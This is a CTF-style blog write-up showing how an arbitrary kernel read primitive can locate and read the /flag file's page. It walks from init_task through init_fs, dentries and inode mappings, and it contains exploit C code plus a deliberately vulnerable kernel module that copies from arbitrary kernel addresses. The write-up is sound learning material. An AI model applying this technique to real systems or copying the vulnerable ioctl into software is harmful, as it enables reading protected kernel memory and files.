From AAR to /flag (Part 1)
For kernel challenges, an AAR primitive is very powerful. Sometimes it’s even enough to extract the flag without RIP control. I decided to investigate into it. In this post, I am going to extract a file with AAR only.
Intro
My very first solved kernel challenge solved is “SCTF 2021 flying_kernel”. In that challenge, there’s a format string vulnerability, where you can achieve AAR. I did not have experience with kernel exploitation, so I just brute-forced the address space with “%s” and found the flag.
Two weeks ago, there was a challenge called krce from zer0pts CTF 2022. The challenge is a simple heap buffer overflow and we achieved AAR and AAW initially. However, we are not provided with a shell, therefore modifying task struct credential is not enough to give us a shell. My initial thought is to find the memory where “busybox” resides, and write shellcode to it so that when “umount” is executed we spawn a shell. Unfortunately, the disk layout is very different each time, so we don’t have a fixed offset. We solved the challenge using another method, but I knew I can somehow find the address reliably.
Here I am.
Works have been done
So the first thing I did is to Google whether people have done this sort of thing before, and I found this writeup presented by team Eureka. I know this was a renowned team back in the days, and they became team r3kapig with team FlappyPig. Anyways, it’s a team I looked up to when I first played CTF.
I suggest you scan this writeup before continuing, as in this part we’re just repeating the exploit, but in a detailed process.
In Theory
First, init_fs
is a fs_struct
struct, and it is at a fixed offset to kernel base.
init_fs.root.dentry
is a pointer to struct dentry
.
A dentry is the glue that holds inodes and files together by relating inode numbers to file names. Dentries also play a role in directory caching which, ideally, keeps the most frequently used files on-hand for faster access. File system traversal is another aspect of the dentry as it maintains a relationship between directories and their files.
https://unix.stackexchange.com/questions/4402/what-is-a-superblock-inode-dentry-and-a-file
We can see that (init_fs.root.dentry)->d_iname
is /
, so this is the root directory.
To access its children, it has a (init_fs.root.dentry)->d_subdirs
, which is a Linux linked list. We can iterate this linked list and find the dentry of /flag
.
After getting the flag file’s dentry (let’s call it flag_dentry
), we can access its inode flag_dentry->inode
.
Then, in this inode structure, it contains the memory mapping information flag_dentry->inode->i_mapping
. The structure here is called address_space
, and we need to get the page info from it and find the actual page.
In Practice
However, there are a few tricky problems we need to solve: Randomized layout and different offsets. My goal is to implement a universal exploit, but in this post, I am going to write a sloppy one that works on my own kernel only.
I wrote a vulnerable kernel module as follows.
struct request{
void* addr;
void* buf;
int size;
};
static long module_ioctl(struct file *filp, unsigned int command, long unsigned int buf) {
struct request req;
copy_from_user(&req, buf, sizeof(struct request));
if(command == 0x1234){
return copy_to_user(req.buf, req.addr, req.size);
}
}
Find init_fs
As described above, we need to locate init_fs
. It is a global variable in the kernel, and it should be at a fixed offset to the kernel. However, without the symbol names, it’s still not easy to find its address.
init_fs
is referenced in struct task_struct init_task
, and it has the following layout.
char comm[TASK_COMM_LEN]; // Default 16
struct nameidata *nameidata;
#ifdef CONFIG_SYSVIPC
struct sysv_sem sysvsem;
struct sysv_shm sysvshm;
#endif
#ifdef CONFIG_DETECT_HUNG_TASK
unsigned long last_switch_count;
unsigned long last_switch_time;
#endif
struct fs_struct *fs; // In init_task, this points to init_fs
And for init_task
, the comm
is always (or not, please correct me if it’s not) swapper
.
So we can start to brute-force the kernel bss to find swapper
string, and then find the init_fs
.
unsigned long swapper_string = 0;
int i = 0;
unsigned long val;
while(1){
printf("%p\r", (void*)(kernel_bss_base + i * 8));
val = read8((void*)(kernel_bss_base + i * 8));
if (val == 0x2f72657070617773){ // swapper
swapper_string = kernel_bss_base + i * 8;
printf("[+] Found \"swapper\" string @ %p\n", swapper_string);
break;
}
i++;
}
unsigned long init_fs = read8((void*)(swapper_string + 0x40)); // May vary due to config
Find init_fs.root.dentry
This title might be confusing: since you already have init_fs
, isn’t init_fs.root.dentry
just init_fs + some_offset
? Well, here’s the definition of the structs.
// https://elixir.bootlin.com/linux/latest/source/include/linux/fs_struct.h
struct fs_struct {
int users;
spinlock_t lock;
seqcount_spinlock_t seq;
int umask;
int in_exec;
struct path root, pwd;
} __randomize_layout;
// https://elixir.bootlin.com/linux/latest/source/include/linux/path.h
struct path {
struct vfsmount *mnt;
struct dentry *dentry;
} __randomize_layout;
Notice the __randomize_layout
. This is a security mitigation so that the compiler will randomize the layout of the struct.
It is not entirely safe though and we can bypass it. (It’s not a security design flaw, but the purpose of this mitigation is not to prevent actions we are doing now). But in this post, I am just going to write the easy version that works for my kernel only. I am going to improve it in the next post. Here we just assume we know all randomized offsets.
unsigned long root_dentry = read8((void*)(init_fs + 0x20)); // Notice, randomized
Iterate root_dentry
’s children
Next is to find the children of this dentry
. As mentioned before, the type for d_subdir
is Linux’s doubly linked list, defined as follows.
struct list_head {
struct list_head *next;
struct list_head *prev;
}
You might be surprised if it’s your first time seeing this, because I was. Where is the data stored?
What I did is to find references to d_subdirs
and see how the Linux kernel handles it.
// fs/coda/cache.c
list_for_each_entry(de, &parent->d_subdirs, d_child) {
if (d_inode(de) )
coda_flag_inode(d_inode(de), flag);
}
Dig deeper…
// https://elixir.bootlin.com/linux/latest/source/include/linux/list.h
#define list_for_each_entry(pos, head, member) \
for (pos = list_first_entry(head, typeof(*pos), member); \
!list_entry_is_head(pos, head, member); \
pos = list_next_entry(pos, member))
#define list_first_entry(ptr, type, member) \
list_entry((ptr)->next, type, member)
#define list_entry(ptr, type, member) \
container_of(ptr, type, member)
And deeper…
// https://elixir.bootlin.com/linux/latest/source/include/linux/container_of.h
#define container_of(ptr, type, member) ({ \
void *__mptr = (void *)(ptr); \
((type *)(__mptr - offsetof(type, member))); })
Here’s a diagram helps you understanding.
Here is the code to iterate the filenames,
unsigned long curr_filename_ptr = 0;
unsigned long curr_filename = 0;
unsigned long dummy = 0;
unsigned long curr_dentry = root_dentry;
unsigned long next = root_dentry + 0xa0; // offset d_subdir
for(int i = 0; i < 30; i++){
curr_filename_ptr = read8((void*)(curr_dentry + 0x28)); // d_name, points to d_iname
curr_filename = read8((void*)(curr_filename_ptr));
printf("[+] Current filename is :\"%s\" %p\n", &curr_filename, curr_filename);
if(curr_filename == 0x67616c66){ // flag
break;
}
for(int j = 0; j < i + 1; j++){
next = read8((void*)next);
}
curr_dentry = next - 0xa0 + 0x10; // 0x10 = offset d_subdir - offset d_child
// printf("[+] Next entry is %p\n", curr_dentry);
}
if(!curr_filename){
puts("Cannot find file");
exit(0);
}
And we can find the inode of flag.
unsigned long flag_dentry = curr_dentry;
unsigned long inode = read8((void*)(flag_dentry + 0x30)); // may vary
Find the page using inode
Now only one thing needs to be done: find the inode memory mapping. This is done via the member struct address_space *
.
In the writeup, Linux still uses struct radix_tree_root
to store page information. It is now replaced with a new data structure called xarray
, which stands for extended array. It took me some time to figure out how to get the page from an address_space
. Here’s my solution.
I found two helper functions read_mapping_page
and page_address
in Linux kernel source code and added another functionality in the vulnerable kernel module.
else if(command == 0x1235){
struct page *page;
page = read_mapping_page(((struct inode*)req.addr)->i_mapping, 0, NULL);
// return copy_to_user(req.buf, &page, 8);
if(IS_ERR(page))
return PTR_ERR(page);
void* addr = page_address(page);
return copy_to_user(req.buf, &addr, 8);
}
So I can pass the pointer of flag’s inode to the kernel and let it do the extraction and see how it works. And here is how it works. First, we need to get a struct page
from this xarray.
struct xarray {
spinlock_t xa_lock;
gfp_t xa_flags;
void __rcu * xa_head;
};
Since this file is small, it should only have one page. The xa_head
directly points to the page struct we want. It really confuses me when I did a p *(struct page*) 0xsome_addr
and it looks weird that there’re negative values for counters.
By verifying using the kernel module, it is how you find the page struct.
Then is to find the actual virtual address based on that page struct. The function I used is page_address
. Though it is not identified as inline
, the compiler compiles it into assembly directly. Using gdb I can see it reads two values, one is page_offset_base
and the other is vmemmap_base
. These two are also kernel bss addresses and at fixed offsets.
call 0xffffffff81233e50 <read_cache_page>
sub rax,QWORD PTR [rip+0xffffffffc219601b] # 0xffffffff82198090 <vmemmap_base>
mov rdi,QWORD PTR [rsp+0x10]
sar rax,0x6
shl rax,0xc
add rax,QWORD PTR [rip+0xffffffffc219600f] # 0xffffffff821980a0 <page_offset_base>
mov QWORD PTR [rsp],rax
This is the last piece of the puzzle. And here is the exploit.
unsigned long inode_addr_space = read8((void*)(inode + 0x30));
printf("[+] inode->i_mapping is @%p\n", inode_addr_space);
unsigned long page_struct = read8((void*)(inode_addr_space + 0x10));
printf("[+] page_struct is at @%p\n", page_struct);
unsigned long page_offset_base = read8((void*)(kernel_text + 0x11980a0)); // page_offset_base
unsigned long vmemmap_base = read8((void*)(kernel_text + 0x1198090)); // vmemmap_base
unsigned long file_page = (((page_struct - vmemmap_base) >> 6) << 12) + page_offset_base;
printf("[+] file page is @%p\n", file_page);
What to expect for part 2
Like I said before, I am going to give a universal solution. Here we have a few problems still not solved:
- Randomized layout
- Only files mapped to one page are possible
- Still some offsets (
page_offset_base
,vmemmap_base
)
To solve these, decompilation might be needed. If you read the writeup I’ve linked, it shows how to manually find the offsets. In the next part, I will develop an exploit to find it automatically.
Links
http://r3ka.eu/2018/09/twctf-2018-rkm-readablekernelmodule-writeup/